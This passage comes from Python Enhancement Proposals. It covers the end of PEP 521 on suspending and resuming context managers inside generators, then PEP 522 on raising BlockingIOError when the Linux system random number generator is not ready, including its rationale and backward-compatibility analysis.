and async for constructs.
Nested blocks
Given this code:
def f():
with OUTER:
with INNER:
yield VALUE
then we perform the following operations in the following sequence:
INNER.__suspend__()
OUTER.__suspend__()
yield VALUE
OUTER.__resume__()
INNER.__resume__()
Note that this ensures that the following is a valid refactoring:
def f():
with OUTER:
yield from g()
def g():
with INNER:
yield VALUE
Similarly, with statements with multiple context managers suspend
from right to left, and resume from left to right.
Other changes
Appropriate __suspend__ and __resume__ methods are added to
warnings.catch_warnings and decimal.localcontext.
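To make the protocol concrete, here is a rough sketch of what a catch_warnings-style manager might look like under this (ultimately withdrawn) proposal; the class name and its bookkeeping are invented for illustration, and nothing in released Pythons actually calls __suspend__ or __resume__:
import warnings

class suspendable_catch_warnings:
    def __enter__(self):
        self._outer = warnings.filters[:]  # caller's filters, restored on suspend/exit
        return self

    def __suspend__(self):
        # About to yield: stash the filters set inside the block and
        # restore the caller's filters so they don't leak out.
        self._inner = warnings.filters[:]
        warnings.filters[:] = self._outer

    def __resume__(self):
        # Execution re-entered the block: remember the (possibly updated)
        # outer filters and reinstate the block's own filters.
        self._outer = warnings.filters[:]
        warnings.filters[:] = self._inner

    def __exit__(self, *exc_info):
        warnings.filters[:] = self._outer
        return False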
Rationale
In the abstract, we gave an example of plausible but incorrect code:
def f():
with warnings.catch_warnings():
for x in g():
yield x
To make this correct in current Python, we need to instead write
something like:
def f():
with warnings.catch_warnings():
it = iter(g())
while True:
with warnings.catch_warnings():
try:
x = next(it)
except StopIteration:
break
yield x
OTOH, if this PEP is accepted then the original code will become
correct as-is. Or if this isn’t convincing, then here’s another
example of broken code; fixing it requires even greater gyrations, and
these are left as an exercise for the reader:
async def test_foo_emits_warning():
with warnings.catch_warnings(record=True) as w:
await foo()
assert len(w) == 1
assert "xyzzy" in w[0].message
And notice that this last example isn’t artificial at all – this is
exactly how you write a test that an async/await-using coroutine
correctly raises a warning. Similar issues arise for pretty much any
use of warnings.catch_warnings, decimal.localcontext, or
numpy.errstate in async/await-using code. So there’s clearly a
real problem to solve here, and the growing prominence of async code
makes it increasingly urgent.
Alternative approaches
The main alternative that has been proposed is to create some kind of
“task-local storage”, analogous to “thread-local storage”
[1]. In essence, the idea would be that the
event loop would take care to allocate a new “task namespace” for each
task it schedules, and provide an API to at any given time fetch the
namespace corresponding to the currently executing task. While there
are many details to be worked out [2], the basic
idea seems doable, and it is an especially natural way to handle the
kind of global context that arises at the top-level of async
application frameworks (e.g., setting up context objects in a web
framework). But it also has a number of flaws:
It only solves the problem of managing global state for coroutines
that yield back to an asynchronous event loop. But there
actually isn’t anything about this problem that’s specific to
asyncio – as shown in the examples above, simple generators run
into exactly the same issue.
It creates an unnecessary coupling between event loops and code that
needs to manage global state. Obviously an async web framework needs
to interact with some event loop API anyway, so it’s not a big deal
in that case. But it’s weird that warnings or decimal or
NumPy should have to call into an async library’s API to access
their internal state when they themselves involve no async code.
Worse, since there are multiple event loop APIs in common use, it
isn’t clear how to choose which to integrate with. (This could be
somewhat mitigated by CPython providing a standard API for creating
and switching “task-local domains” that asyncio, Twisted, tornado,
etc. could then work with.)
It’s not at all clear that this can be made acceptably fast. NumPy
has to check the floating point error settings on every single
arithmetic operation. Checking a piece of data in thread-local
storage is absurdly quick, because modern platforms have put massive
resources into optimizing this case (e.g. dedicating a CPU register
for this purpose); calling a method on an event loop to fetch a
handle to a namespace and then doing lookup in that namespace is
much slower.
More importantly, this extra cost would be paid on every access to
the global data, even for programs which are not otherwise using an
event loop at all. This PEP’s proposal, by contrast, only affects
code that actually mixes with blocks and yield statements,
meaning that the users who experience the costs are the same users
who also reap the benefits.
On the other hand, such tight integration between task context and the
event loop does potentially allow other features that are beyond the
scope of the current proposal. For example, an event loop could note
which task namespace was in effect when a task called call_soon,
and arrange that the callback when run would have access to the same
task namespace. Whether this is useful, or even well-defined in the
case of cross-thread calls (what does it mean to have task-local
storage accessed from two threads simultaneously?), is left as a
puzzle for event loop implementors to ponder – nothing in this
proposal rules out such enhancements as well. It does seem though
that such features would be useful primarily for state that already
has a tight integration with the event loop – while we might want a
request id to be preserved across call_soon, most people would not
expect:
with warnings.catch_warnings():
loop.call_soon(f)
to result in f being run with warnings disabled, which would be
the result if call_soon preserved global context in general. It’s
also unclear how this would even work given that the warnings context
manager __exit__ would be called before f.
So this PEP takes the position that __suspend__/__resume__
and “task-local storage” are two complementary tools that are both
useful in different circumstances.
Backwards compatibility
Because __suspend__ and __resume__ are optional and default to
no-ops, all existing context managers continue to work exactly as
before.
Speed-wise, this proposal adds additional overhead when entering a
with block (where we must now check for the additional methods;
failed attribute lookup in CPython is rather slow, since it involves
allocating an AttributeError), and additional overhead at
suspension points. Since the position of with blocks and
suspension points is known statically, the compiler can
straightforwardly optimize away this overhead in all cases except
where one actually has a yield inside a with. Furthermore,
because we only do attribute checks for __suspend__ and
__resume__ once at the start of a with block, when these
attributes are undefined then the per-yield overhead can be optimized
down to a single C-level if (frame->needs_suspend_resume_calls) {
... }. Therefore, we expect the overall overhead to be negligible.
Interaction with PEP 492
PEP 492 added new asynchronous context managers, which are like
regular context managers, but instead of having regular methods
__enter__ and __exit__ they have coroutine methods
__aenter__ and __aexit__.
Following this pattern, one might expect this proposal to add
__asuspend__ and __aresume__ coroutine methods. But this
doesn’t make much sense, since the whole point is that __suspend__
should be called before yielding our thread of execution and allowing
other code to run. The only thing we accomplish by making
__asuspend__ a coroutine is to make it possible for
__asuspend__ itself to yield. So either we need to recursively
call __asuspend__ from inside __asuspend__, or else we need to
give up and allow these yields to happen without calling the suspend
callback; either way it defeats the whole point.
Well, with one exception: one possible pattern for coroutine code is
to call yield in order to communicate with the coroutine runner,
but without actually suspending their execution (i.e., the coroutine
might know that the coroutine runner will resume them immediately
after processing the yielded message). An example of this is the
curio.timeout_after async context manager, which yields a special
set_timeout message to the curio kernel, and then the kernel
immediately (synchronously) resumes the coroutine which sent the
message. And from the user point of view, this timeout value acts just
like the kinds of global variables that motivated this PEP. But, there
is a crucial difference: this kind of async context manager is, by
definition, tightly integrated with the coroutine runner. So, the
coroutine runner can take over responsibility for keeping track of
which timeouts apply to which coroutines without any need for this PEP
at all (and this is indeed how curio.timeout_after works).
That leaves two reasonable approaches to handling async context managers:
Add plain __suspend__ and __resume__ methods.
Leave async context managers alone for now until we have more
experience with them.
Either seems plausible, so out of laziness / YAGNI this PEP tentatively
proposes to stick with option (2).
References
[1]
https://groups.google.com/forum/#!topic/python-tulip/zix5HQxtElg
https://github.com/python/asyncio/issues/165
[2]
For example, we would have to decide
whether there is a single task-local namespace shared by all users
(in which case we need a way for multiple third-party libraries to
adjudicate access to this namespace), or else if there are multiple
task-local namespaces, then we need some mechanism for each library
to arrange for their task-local namespaces to be created and
destroyed at appropriate moments. The preliminary patch linked
from the github issue above doesn’t seem to provide any mechanism
for such lifecycle management.
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 521 – Managing global context via ‘with’ blocks in generators and coroutines | Standards Track | While we generally try to avoid global state when possible, there
nonetheless exist a number of situations where it is agreed to be the
best approach. In Python, a standard pattern for handling such cases
is to store the global state in global or thread-local storage, and
then use with blocks to limit modifications of this global state
to a single dynamic scope. Examples where this pattern is used include
the standard library’s warnings.catch_warnings and
decimal.localcontext, NumPy’s numpy.errstate (which exposes
the error-handling settings provided by the IEEE 754 floating point
standard), and the handling of logging context or HTTP request context
in many server application frameworks. |
PEP 522 – Allow BlockingIOError in security sensitive APIs
Author:
Alyssa Coghlan <ncoghlan at gmail.com>, Nathaniel J. Smith <njs at pobox.com>
Status:
Rejected
Type:
Standards Track
Requires:
506
Created:
16-Jun-2016
Python-Version:
3.6
Resolution:
Security-SIG message
Table of Contents
Abstract
Relationship with other PEPs
PEP Rejection
Changes independent of this PEP
Proposal
Changing os.urandom() on platforms with the getrandom() system call
Adding secrets.wait_for_system_rng()
Limitations on scope
Rationale
Ensuring the secrets module implicitly blocks when needed
Raising BlockingIOError in os.urandom() on Linux
Making secrets.wait_for_system_rng() public
Backwards Compatibility Impact Assessment
Unaffected Applications
Affected security sensitive applications
Affected non-security sensitive applications
Additional Background
Why propose this now?
The cross-platform behaviour of os.urandom()
Problems with the behaviour of /dev/urandom on Linux
Consequences of getrandom() availability for Python
References
Copyright
Abstract
A number of APIs in the standard library that return random values nominally
suitable for use in security sensitive operations currently have an obscure
operating system dependent failure mode that allows them to return values that
are not, in fact, suitable for such operations.
This is due to some operating system kernels (most notably the Linux kernel)
permitting reads from /dev/urandom before the system random number
generator is fully initialized, whereas most other operating systems will
implicitly block on such reads until the random number generator is ready.
For the lower level os.urandom and random.SystemRandom APIs, this PEP
proposes changing such failures in Python 3.6 from the current silent,
hard to detect, and hard to debug, errors to easily detected and debugged errors
by raising BlockingIOError with a suitable error message, allowing
developers the opportunity to unambiguously specify their preferred approach
for handling the situation.
For the new high level secrets API, it proposes to block implicitly if
needed whenever a random number is generated by that module, as well as to
expose a new secrets.wait_for_system_rng() function to allow code otherwise
using the low level APIs to explicitly wait for the system random number
generator to be available.
This change will impact any operating system that offers the getrandom()
system call, regardless of whether the default behaviour of the
/dev/urandom device is to return potentially predictable results when the
system random number generator is not ready (e.g. Linux, NetBSD) or to block
(e.g. FreeBSD, Solaris, Illumos). Operating systems that prevent execution of
userspace code prior to the initialization of the system random number
generator, or do not offer the getrandom() syscall, will be entirely
unaffected by the proposed change (e.g. Windows, Mac OS X, OpenBSD).
The new exception or the blocking behaviour in the secrets module would
potentially be encountered in the following situations:
Python code calling these APIs during Linux system initialization
Python code running on improperly initialized Linux systems (e.g. embedded
hardware without adequate sources of entropy to seed the system random number
generator, or Linux VMs that aren’t configured to accept entropy from the
VM host)
Relationship with other PEPs
This PEP depends on the Accepted PEP 506, which adds the secrets module.
This PEP competes with Victor Stinner’s PEP 524, which proposes to make
os.urandom itself implicitly block when the system RNG is not ready.
PEP Rejection
For the reference implementation, Guido rejected this PEP in favour of the
unconditional implicit blocking proposal in PEP 524 (which brings CPython’s
behaviour on Linux into line with its behaviour on other operating systems).
This means any further discussion of appropriate default behaviour for
os.urandom() in system Python installations in Linux distributions should
take place on the respective distro mailing lists, rather than on the upstream
CPython mailing lists.
Changes independent of this PEP
CPython interpreter initialization and random module initialization have
already been updated to gracefully fall back to alternative seeding options if
the system random number generator is not ready.
This PEP does not compete with the proposal in PEP 524 to add an
os.getrandom() API to expose the getrandom syscall on platforms that
offer it. There is sufficient motive for adding that API in the os module’s
role as a thin wrapper around potentially platform dependent operating system
features that it can be added regardless of what happens to the default
behaviour of os.urandom() on these systems.
Proposal
Changing os.urandom() on platforms with the getrandom() system call
This PEP proposes that in Python 3.6+, os.urandom() be updated to call
the getrandom() syscall in non-blocking mode if available and raise
BlockingIOError: system random number generator is not ready; see secrets.token_bytes()
if the kernel reports that the call would block.
This behaviour will then propagate through to the existing
random.SystemRandom, which provides a relatively thin wrapper around
os.urandom() that matches the random.Random() API.
However, the new secrets module introduced by PEP 506 will be updated to
catch the new exception and implicitly wait for the system random number
generator if the exception is ever encountered.
In all cases, as soon as a call to one of these security sensitive APIs
succeeds, all future calls to these APIs in that process will succeed
without blocking (once the operating system random number generator is ready
after system boot, it remains ready).
On Linux and NetBSD, this will replace the previous behaviour of returning
potentially predictable results read from /dev/urandom.
On FreeBSD, Solaris, and Illumos, this will replace the previous behaviour of
implicitly blocking until the system random number generator is ready. However,
it is not clear if these operating systems actually allow userspace code (and
hence Python) to run before the system random number generator is ready.
Note that in all cases, if calling the underlying getrandom() API reports
ENOSYS rather than returning a successful response or reporting EAGAIN,
CPython will continue to fall back to reading from /dev/urandom directly.
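Expressed in Python purely for illustration (the real change would live in CPython's C implementation; the function name below is invented, and os.getrandom()/os.GRND_NONBLOCK were only added in Python 3.6 on Linux), the proposed dispatch looks roughly like:
import os

def urandom_as_proposed(nbytes):
    try:
        # Ask the kernel in non-blocking mode.
        return os.getrandom(nbytes, os.GRND_NONBLOCK)
    except BlockingIOError:
        # The system RNG is not yet initialized.
        raise BlockingIOError(
            "system random number generator is not ready; "
            "see secrets.token_bytes()") from None
    except (AttributeError, OSError):
        # getrandom() unavailable (e.g. ENOSYS, or an older kernel/Python):
        # fall back to reading /dev/urandom directly.
        with open("/dev/urandom", "rb") as f:
            return f.read(nbytes)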
Adding secrets.wait_for_system_rng()
A new exception shouldn’t be added without a straightforward recommendation
for how to resolve that error when encountered (however rare encountering
the new error is expected to be in practice). For security sensitive code that
actually does need to use the lower level interfaces to the system random
number generator (rather than the new secrets module), and does receive
live bug reports indicating this is a real problem for the userbase of that
particular application rather than a theoretical one, this PEP’s recommendation
will be to add the following snippet (directly or indirectly) to the
__main__ module:
import secrets
secrets.wait_for_system_rng()
Or, if compatibility with versions prior to Python 3.6 is needed:
try:
import secrets
except ImportError:
pass
else:
secrets.wait_for_system_rng()
Within the secrets module itself, this will then be used in
token_bytes() to block implicitly if the new exception is encountered:
def token_bytes(nbytes=None):
if nbytes is None:
nbytes = DEFAULT_ENTROPY
try:
result = os.urandom(nbytes)
except BlockingIOError:
wait_for_system_rng()
result = os.urandom(nbytes)
return result
Other parts of the module will then be updated to use token_bytes() as
their basic random number generation building block, rather than calling
os.urandom() directly.
Application frameworks covering use cases where access to the system random
number generator is almost certain to be needed (e.g. web frameworks) may
choose to incorporate a call to secrets.wait_for_system_rng() implicitly
into the commands that start the application such that existing calls to
os.urandom() will be guaranteed to never raise the new exception when using
those frameworks.
For cases where the error is encountered for an application which cannot be
modified directly, then the following command can be used to wait for the
system random number generator to initialize before starting that application:
python3 -c "import secrets; secrets.wait_for_system_rng()"
For example, this snippet could be added to a shell script or a systemd
ExecStartPre hook (and may prove useful in reliably waiting for the
system random number generator to be ready, even if the subsequent command
is not itself an application running under Python 3.6).
Given the changes proposed to os.urandom() above, and the inclusion of
an os.getrandom() API on systems that support it, the suggested
implementation of this function would be:
if hasattr(os, "getrandom"):
# os.getrandom() always blocks waiting for the system RNG by default
def wait_for_system_rng():
"""Block waiting for system random number generator to be ready"""
os.getrandom(1)
return
else:
# As far as we know, other platforms will never get BlockingIOError
# below but the implementation makes pessimistic assumptions
def wait_for_system_rng():
"""Block waiting for system random number generator to be ready"""
# If the system RNG is already seeded, don't wait at all
try:
os.urandom(1)
return
except BlockingIOError:
pass
# Avoid the below busy loop if possible
try:
block_on_system_rng = open("/dev/random", "rb")
except FileNotFoundError:
pass
else:
with block_on_system_rng:
block_on_system_rng.read(1)
# Busy loop until the system RNG is ready
while True:
try:
os.urandom(1)
break
except BlockingIOError:
# Only check once per millisecond
time.sleep(0.001)
On systems where it is possible to wait for the system RNG to be ready, this
function will do so without a busy loop if os.getrandom() is defined,
os.urandom() itself implicitly blocks, or the /dev/random device is
available. If the system random number generator is ready, this call is
guaranteed to never block, even if the system’s /dev/random device uses
a design that permits it to block intermittently during normal system operation.
Limitations on scope
No changes are proposed for Windows or Mac OS X systems, as neither of those
platforms provides any mechanism to run Python code before the operating
system random number generator has been initialized. Mac OS X goes so far as
to kernel panic and abort the boot process if it can’t properly initialize the
random number generator (although Apple’s restrictions on the supported
hardware platforms make that exceedingly unlikely in practice).
Similarly, no changes are proposed for other *nix systems that do not offer
the getrandom() syscall. On these systems, os.urandom() will continue
to block waiting for the system random number generator to be initialized.
While other *nix systems that offer a non-blocking API (other than
getrandom()) for requesting random numbers suitable for use in security
sensitive applications could potentially receive a similar update to the one
proposed for getrandom() in this PEP, such changes are out of scope for
this particular proposal.
Python’s behaviour on older versions of affected platforms that do not offer
the new getrandom() syscall will also remain unchanged.
Rationale
Ensuring the secrets module implicitly blocks when needed
This is done so that, for folks who want the simplest possible answer to the
right way to generate security sensitive random numbers, the guidance can be
“Use the secrets module when available or your application might
crash unexpectedly”, rather than the more boilerplate heavy “Always call
secrets.wait_for_system_rng() when available or your application might crash
unexpectedly”.
It’s also done due to the BDFL having a higher tolerance for APIs that might
block unexpectedly than he does for APIs that might throw an unexpected
exception [11].
Raising BlockingIOError in os.urandom() on Linux
For several years now, the security community’s guidance has been to use
os.urandom() (or the random.SystemRandom() wrapper) when implementing
security sensitive operations in Python.
To help improve API discoverability and make it clearer that secrecy and
simulation are not the same problem (even though they both involve
random numbers), PEP 506 collected several of the one line recipes based
on the lower level os.urandom() API into a new secrets module.
However, this guidance has also come with a longstanding caveat: developers
writing security sensitive software at least for Linux, and potentially for
some other *BSD systems, may need to wait until the operating system’s
random number generator is ready before relying on it for security sensitive
operations. This generally only occurs if os.urandom() is read very
early in the system initialization process, or on systems with few sources of
available entropy (e.g. some kinds of virtualized or embedded systems), but
unfortunately the exact conditions that trigger this are difficult to predict,
and when it occurs then there is no direct way for userspace to tell it has
happened without querying operating system specific interfaces.
On *BSD systems (if the particular *BSD variant allows the problem to occur
at all) and potentially also Solaris and Illumos, encountering this situation
means os.urandom() will either block waiting for the system random number
generator to be ready (the associated symptom would be for the affected script
to pause unexpectedly on the first call to os.urandom()) or else will
behave the same way as it does on Linux.
On Linux, in Python versions up to and including Python 3.4, and in
Python 3.5 maintenance versions following Python 3.5.2, there’s no clear
indicator to developers that their software may not be working as expected
when run early in the Linux boot process, or on hardware without good
sources of entropy to seed the operating system’s random number generator: due
to the behaviour of the underlying /dev/urandom device, os.urandom()
on Linux returns a result either way, and it takes extensive statistical
analysis to show that a security vulnerability exists.
By contrast, if BlockingIOError is raised in those situations, then
developers using Python 3.6+ can easily choose their desired behaviour:
Wait for the system RNG at or before application startup (security sensitive)
Switch to using the random module (non-security sensitive)
Making secrets.wait_for_system_rng() public
Earlier versions of this PEP proposed a number of recipes for wrapping
os.urandom() to make it suitable for use in security sensitive use cases.
Discussion of the proposal on the security-sig mailing list prompted the
realization [9] that the core assumption driving the API design in this PEP
was that choosing between letting the exception cause the application to fail,
blocking waiting for the system RNG to be ready and switching to using the
random module instead of os.urandom is an application and use-case
specific decision that should take into account application and use-case
specific details.
There is no way for the interpreter runtime or support libraries to determine
whether a particular use case is security sensitive or not, and while it’s
straightforward for application developer to decide how to handle an exception
thrown by a particular API, they can’t readily workaround an API blocking when
they expected it to be non-blocking.
Accordingly, the PEP was updated to add secrets.wait_for_system_rng() as
an API for applications, scripts and frameworks to use to indicate that they
wanted to ensure the system RNG was available before continuing, while library
developers could continue to call os.urandom() without worrying that it
might unexpectedly start blocking waiting for the system RNG to be available.
Backwards Compatibility Impact Assessment
Similar to PEP 476, this is a proposal to turn a previously silent security
failure into a noisy exception that requires the application developer to
make an explicit decision regarding the behaviour they desire.
As no changes are proposed for operating systems that don’t provide the
getrandom() syscall, os.urandom() retains its existing behaviour as
a nominally blocking API that is non-blocking in practice due to the difficulty
of scheduling Python code to run before the operating system random number
generator is ready. We believe it may be possible to encounter problems akin to
those described in this PEP on at least some *BSD variants, but nobody has
explicitly demonstrated that. On Mac OS X and Windows, it appears to be
straight up impossible to even try to run a Python interpreter that early in
the boot process.
On Linux and other platforms with similar /dev/urandom behaviour,
os.urandom() retains its status as a guaranteed non-blocking API.
However, the means of achieving that status changes in the specific case of
the operating system random number generator not being ready for use in security
sensitive operations: historically it would return potentially predictable
random data, with this PEP it would change to raise BlockingIOError.
Developers of affected applications would then be required to make one of the
following changes to gain forward compatibility with Python 3.6, based on the
kind of application they’re developing.
Unaffected Applications
The following kinds of applications would be entirely unaffected by the change,
regardless of whether or not they perform security sensitive operations:
applications that don’t support Linux
applications that are only run on desktops or conventional servers
applications that are only run after the system RNG is ready (including
those where an application framework calls secrets.wait_for_system_rng()
on their behalf)
Applications in this category simply won’t encounter the new exception, so it
will be reasonable for developers to wait and see if they receive
Python 3.6 compatibility bugs related to the new runtime behaviour, rather than
attempting to pre-emptively determine whether or not they’re affected.
Affected security sensitive applications
Security sensitive applications would need to either change their system
configuration so the application is only started after the operating system
random number generator is ready for security sensitive operations, change the
application startup code to invoke secrets.wait_for_system_rng(), or
else switch to using the new secrets.token_bytes() API.
As an example for components started via a systemd unit file, the following
snippet would delay activation until the system RNG was ready:
ExecStartPre=python3 -c "import secrets; secrets.wait_for_system_rng()"
Alternatively, the following snippet will use secrets.token_bytes() if
available, and fall back to os.urandom() otherwise:
try:
    from secrets import token_bytes as _get_random_bytes
except ImportError:
    from os import urandom as _get_random_bytes
Affected non-security sensitive applications
Non-security sensitive applications should be updated to use the random
module rather than os.urandom:
def pseudorandom_bytes(num_bytes):
return random.getrandbits(num_bytes*8).to_bytes(num_bytes, "little")
Depending on the details of the application, the random module may offer
other APIs that can be used directly, rather than needing to emulate the
raw byte sequence produced by the os.urandom() API.
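For instance (illustrative only; these are ordinary random-module functions), many non-security-sensitive needs can be met without emulating raw bytes at all:
import random

request_id = random.getrandbits(64)   # a 64-bit pseudorandom integer
backoff = random.uniform(0.5, 1.5)    # jitter for a retry delay
bucket = random.randrange(1000)       # a pseudorandom int below 1000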
Additional Background
Why propose this now?
The main reason is because the Python 3.5.0 release switched to using the new
Linux getrandom() syscall when available in order to avoid consuming a
file descriptor [1], and this had the side effect of making the following
operations block waiting for the system random number generator to be ready:
os.urandom (and APIs that depend on it)
importing the random module
initializing the randomized hash algorithm used by some builtin types
While the first of those behaviours is arguably desirable (and consistent with
the existing behaviour of os.urandom on other operating systems), the
latter two behaviours are unnecessary and undesirable, and the last one is now
known to cause a system level deadlock when attempting to run Python scripts
during the Linux init process with Python 3.5.0 or 3.5.1 [2], while the second
one can cause problems when using virtual machines without robust entropy
sources configured [3].
Since decoupling these behaviours in CPython will involve a number of
implementation changes more appropriate for a feature release than a maintenance
release, the relatively simple resolution applied in Python 3.5.2 was to revert
all three of them to a behaviour similar to that of previous Python versions:
if the new Linux syscall indicates it will block, then Python 3.5.2 will
implicitly fall back on reading /dev/urandom directly [4].
However, this bug report also resulted in a range of proposals to add new
APIs like os.getrandom() [5], os.urandom_block() [6],
os.pseudorandom() and os.cryptorandom() [7], or adding new optional
parameters to os.urandom() itself [8], and then attempting to educate
users on when they should call those APIs instead of just using a plain
os.urandom() call.
These proposals arguably represent overreactions, as the question of reliably
obtaining random numbers suitable for security sensitive work on Linux is a
relatively obscure problem of interest mainly to operating system developers
and embedded systems programmers, that may not justify expanding the
Python standard library’s cross-platform APIs with new Linux-specific concerns.
This is especially so with the secrets module already being added as the
“use this and don’t worry about the low level details” option for developers
writing security sensitive software that for some reason can’t rely on even
higher level domain specific APIs (like web frameworks) and also don’t need to
worry about Python versions prior to Python 3.6.
That said, it’s also the case that low cost ARM devices are becoming
increasingly prevalent, with a lot of them running Linux, and a lot of folks
writing Python applications that run on those devices. That creates an
opportunity to take an obscure security problem that currently requires a lot
of knowledge about Linux boot processes and provably unpredictable random
number generation to diagnose and resolve, and instead turn it into a
relatively mundane and easy-to-find-in-an-internet-search runtime exception.
The cross-platform behaviour of os.urandom()
On operating systems other than Linux and NetBSD, os.urandom() may already
block waiting for the operating system’s random number generator to be ready.
This will happen at most once in the lifetime of the process, and the call is
subsequently guaranteed to be non-blocking.
Linux and NetBSD are outliers in that, even when the operating system’s random
number generator doesn’t consider itself ready for use in security sensitive
operations, reading from the /dev/urandom device will return random values
based on the entropy it has available.
This behaviour is potentially problematic, so Linux 3.17 added a new
getrandom() syscall that (amongst other benefits) allows callers to
either block waiting for the random number generator to be ready, or
else request an error return if the random number generator is not ready.
Notably, the new API does not support the old behaviour of returning
data that is not suitable for security sensitive use cases.
Versions of Python up to and including Python 3.4 access the
Linux /dev/urandom device directly.
Python 3.5.0 and 3.5.1 (when built on a system that offered the new syscall)
called getrandom() in blocking mode in order to avoid the use of a file
descriptor to access /dev/urandom. While there were no specific problems
reported due to os.urandom() blocking in user code, there were problems
due to CPython implicitly invoking the blocking behaviour during interpreter
startup and when importing the random module.
Rather than trying to decouple SipHash initialization from the
os.urandom() implementation, Python 3.5.2 switched to calling
getrandom() in non-blocking mode, and falling back to reading from
/dev/urandom if the syscall indicates it will block.
As a result of the above, os.urandom() in all Python versions up to and
including Python 3.5 propagates the behaviour of the underlying /dev/urandom
device to Python code.
Problems with the behaviour of /dev/urandom on Linux
The Python os module has largely co-evolved with Linux APIs, so having
os module functions closely follow the behaviour of their Linux operating
system level counterparts when running on Linux is typically considered to be
a desirable feature.
However, /dev/urandom represents a case where the current behaviour is
acknowledged to be problematic, but fixing it unilaterally at the kernel level
has been shown to prevent some Linux distributions from booting (at least in
part due to components like Python currently using it for
non-security-sensitive purposes early in the system initialization process).
As an analogy, consider the following two functions:
def generate_example_password():
"""Generates passwords solely for use in code examples"""
return generate_unpredictable_password()
def generate_actual_password():
"""Generates actual passwords for use in real applications"""
return generate_unpredictable_password()
If you think of an operating system’s random number generator as a method for
generating unpredictable, secret passwords, then you can think of Linux’s
/dev/urandom as being implemented like:
# Oversimplified artist's conception of the kernel code
# implementing /dev/urandom
def generate_unpredictable_password():
if system_rng_is_ready:
return use_system_rng_to_generate_password()
else:
# we can't make an unpredictable password; silently return a
# potentially predictable one instead:
return "p4ssw0rd"
In this scenario, the author of generate_example_password is fine - even if
"p4ssw0rd" shows up a bit more often than they expect, it’s only used in
examples anyway. However, the author of generate_actual_password has a
problem - how do they prove that their calls to
generate_unpredictable_password never follow the path that returns a
predictable answer?
In real life it’s slightly more complicated than this, because there
might be some level of system entropy available – so the fallback might
be more like return random.choice(["p4ssword", "passw0rd",
"p4ssw0rd"]) or something even more variable and hence only statistically
predictable with better odds than the author of generate_actual_password
was expecting. This doesn’t really make things more provably secure, though;
mostly it just means that if you try to catch the problem in the obvious way –
if returned_password == "p4ssw0rd": raise UhOh – then it doesn’t work,
because returned_password might instead be p4ssword or even
pa55word, or just an arbitrary 64 bit sequence selected from fewer than
2**64 possibilities. So this rough sketch does give the right general idea of
the consequences of the “more predictable than expected” fallback behaviour,
even though it’s thoroughly unfair to the Linux kernel team’s efforts to
mitigate the practical consequences of this problem without resorting to
breaking backwards compatibility.
This design is generally agreed to be a bad idea. As far as we can
tell, there are no use cases whatsoever in which this is the behavior
you actually want. It has led to the use of insecure ssh keys on
real systems, and many *nix-like systems (including at least Mac OS
X, OpenBSD, and FreeBSD) have modified their /dev/urandom
implementations so that they never return predictable outputs, either
by making reads block in this case, or by simply refusing to run any
userspace programs until the system RNG has been
initialized. Unfortunately, Linux has so far been unable to follow
suit, because it’s been empirically determined that enabling the
blocking behavior causes some currently extant distributions to
fail to boot.
Instead, the new getrandom() syscall was introduced, making
it possible for userspace applications to access the system random number
generator safely, without introducing hard to debug deadlock problems into
the system initialization processes of existing Linux distros.
Consequences of getrandom() availability for Python
Prior to the introduction of the getrandom() syscall, it simply wasn’t
feasible to access the Linux system random number generator in a provably
safe way, so we were forced to settle for reading from /dev/urandom as the
best available option. However, with getrandom() insisting on raising an
error or blocking rather than returning predictable data, as well as having
other advantages, it is now the recommended method for accessing the kernel
RNG on Linux, with reading /dev/urandom directly relegated to “legacy”
status. This moves Linux into the same category as other operating systems
like Windows, which doesn’t provide a /dev/urandom device at all: the
best available option for implementing os.urandom() is no longer simply
reading bytes from the /dev/urandom device.
This means that what used to be somebody else’s problem (the Linux kernel
development team’s) is now Python’s problem – given a way to detect that the
system RNG is not initialized, we have to choose how to handle this
situation whenever we try to use the system RNG.
It could simply block, as was somewhat inadvertently implemented in 3.5.0,
and as is proposed in Victor Stinner’s competing PEP:
# artist's impression of the CPython 3.5.0-3.5.1 behavior
def generate_unpredictable_bytes_or_block(num_bytes):
    while not system_rng_is_ready:
        wait
    return unpredictable_bytes(num_bytes)
Or it could raise an error, as this PEP proposes (in some cases):
# artist's impression of the behavior proposed in this PEP
def generate_unpredictable_bytes_or_raise(num_bytes):
    if system_rng_is_ready:
        return unpredictable_bytes(num_bytes)
    else:
        raise BlockingIOError
Or it could explicitly emulate the /dev/urandom fallback behavior,
as was implemented in 3.5.2rc1 and is expected to remain for the rest
of the 3.5.x cycle:
# artist's impression of the CPython 3.5.2rc1+ behavior
def generate_unpredictable_bytes_or_maybe_not(num_bytes):
    if system_rng_is_ready:
        return unpredictable_bytes(num_bytes)
    else:
        return (b"p4ssw0rd" * (num_bytes // 8 + 1))[:num_bytes]
(And the same caveats apply to this sketch as applied to the
generate_unpredictable_password sketch of /dev/urandom above.)
There are five places where CPython and the standard library attempt to use the
operating system’s random number generator, and thus five places where this
decision has to be made:
initializing the SipHash used to protect str.__hash__ and
friends against DoS attacks (called unconditionally at startup)
initializing the random module (called when random is
imported)
servicing user calls to the os.urandom public API
the higher level random.SystemRandom public API
the new secrets module public API added by PEP 506
Previously, these five places all used the same underlying code, and
thus made this decision in the same way.
This whole problem was first noticed because 3.5.0 switched that
underlying code to the generate_unpredictable_bytes_or_block behavior,
and it turns out that there are some rare cases where Linux boot
scripts attempted to run a Python program as part of system initialization, the
Python startup sequence blocked while trying to initialize SipHash,
and then this triggered a deadlock because the system stopped doing
anything – including gathering new entropy – until the Python script
was forcibly terminated by an external timer. This is particularly unfortunate
since the scripts in question never processed untrusted input, so there was no
need for SipHash to be initialized with provably unpredictable random data in
the first place. This motivated the change in 3.5.2rc1 to emulate the old
/dev/urandom behavior in all cases (by calling getrandom() in
non-blocking mode, and then falling back to reading /dev/urandom
if the syscall indicates that the /dev/urandom pool is not yet
fully initialized.)
We don’t know whether such problems may also exist in the Fedora/RHEL/CentOS
ecosystem, as the build systems for those distributions use chroots on servers
running an older operating system kernel that doesn’t offer the getrandom()
syscall, which means CPython’s current build configuration compiles out the
runtime check for that syscall [10].
A similar problem was found due to the random module calling
os.urandom as a side-effect of import in order to seed the default
global random.Random() instance.
We have not received any specific complaints regarding direct calls to
os.urandom() or random.SystemRandom() blocking with 3.5.0 or 3.5.1 -
only problem reports due to the implicit blocking on interpreter startup and
as a side-effect of importing the random module.
Independently of this PEP, the first two cases have already been updated to
never block, regardless of the behaviour of os.urandom().
Where PEP 524 proposes to make all three of the latter cases block implicitly,
this PEP proposes that approach only for the last case (the secrets
